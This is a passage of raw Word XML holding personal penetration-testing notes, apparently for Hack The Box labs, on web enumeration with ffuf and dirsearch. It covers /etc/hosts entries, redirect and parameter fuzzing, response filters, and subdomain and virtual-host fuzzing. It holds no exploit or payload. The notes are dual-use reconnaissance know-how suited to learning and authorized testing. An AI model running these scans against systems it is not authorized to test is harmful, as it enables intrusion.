    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000119B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1075"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you find a subdomain and add it to /etc/hosts, then you can do normal URL path enumeration without specifying host, and just do it like normal but instead of example.com for the -u, you just do sub.example.com, where sub is the subdomain name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000119C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000119D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1104"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You also need to FIRST add "[IP] [domain]" to /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000119E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1104"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nano /etc/hosts, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and then add something like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">twomillion.htb</w:t>
      </w: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ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011A1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011A2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011A3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Follow redirects</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011A4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-r</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" flag anywhere in the command</w:t>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u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Parameter fuzzing:</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u "http://example.com/page?FUZZ=value" -w /path/to/parameters.txt</w:t>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ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Filtering by number of words:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011AC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u http://10.10.10.10/FUZZ -w /path/to/wordlists.txt -fw 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1292"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes, we get false positives, with something like 1 word, so we can use the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-fw</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" flag to filter OUT all the responses with 1 word. We can also change the number 1 to any</w:t>
      </w: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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Important filters:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Filter out status code:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -fc 404,200</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Match by status code: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-mc 200,403</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Filter out word count: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-fw 50</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Match by word count: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-mw 50</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Filter out line count:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -fl 16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Match by line count: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-ml 16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Filter out response size: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-fs 200</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Match by response size: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-ms 200</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ALL OF THESE WORK with multiple arguments, like -fl 15,16 (no spaces)</w:t>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t xml:space="preserve">What order to filter:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-fc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for status codes, as redirects (like 301) often indicate non-unique responses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-fs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for response size if you see identical sizes across many responses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-fw </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -fl </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">if word or line counts show consistent patterns in default pages.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011BE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011BF">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hosts:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="720"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes, one IP address may be hosting multiple sites (using virtual hosting), so like 10.10.1.1 might have multiple sites like example1.com and example2.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="720"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So in that case, when using tools like gobuster and ffuf, it's best to use the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-H</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" flag to specify the host (ex. example3.com)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="720"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u http://10.10.10.10/FUZZ -H "Host: example.com" -w directory.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="720"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is for URL path fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="720"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you added the host to /etc/hosts, you can just replace the hostname with the IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="720"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u http://example.com/FUZZ -w directory.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="720"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u http://10.10.10.10 -H "Host: FUZZ.example.com" -w subdomains.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="720"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">subdomain fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011C8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011C9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011CA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011CB">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CC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dw1e3xjxeas6" w:id="147"/>
      <w:bookmarkEnd w:id="147"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dirsearch</w:t>
      </w:r>
    </w:p>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The thing about this tool is that it allows for</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> recursive search</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so it automatically goes into subdirectories </w:t>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color w:val="ff0000"/>
        </w:rPr>
